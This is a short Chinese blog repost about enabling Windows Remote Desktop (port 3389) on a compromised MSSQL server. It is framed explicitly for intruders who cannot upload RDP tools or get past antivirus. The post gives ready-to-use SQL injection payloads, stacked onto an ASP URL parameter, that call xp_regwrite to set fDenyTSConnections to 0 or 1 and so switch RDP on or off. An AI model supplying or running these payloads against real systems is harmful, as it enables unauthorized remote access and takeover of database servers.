码迷,mamicode.com
首页 > 数据库 > 详细

MSSQL开启3389

时间:2017-05-16 20:48:33      阅读:217      评论:0      收藏:0      [点我收藏+]

标签:开启   服务器   sql语句   reg   sys   ntc   als   local   set   

其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启3389。 

3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 
其 中键值DenyTSConnections 直接控制着3389的开启和关闭。当该键值为0表示3389开启,1则表示关闭。而MSSQL的xp_regwrite的存储过程可以对注册进行修改。我 们使用这点就可以简单的修改DenyTSConnections键值,从而控制3389的关闭和开启。

开启3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\CurrentControlSet\Control\Terminal Server‘,‘fDenyTSConnections‘,‘REG_DWORD‘,0;

关闭3389的SQL语句:
syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\CurrentControlSet\Control\Terminal Server‘,‘fDenyTSConnections‘,‘REG_DWORD‘,1;

MSSQL开启3389

标签:开启   服务器   sql语句   reg   sys   ntc   als   local   set   

原文地址:http://www.cnblogs.com/xiaolangjun/p/6863394.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!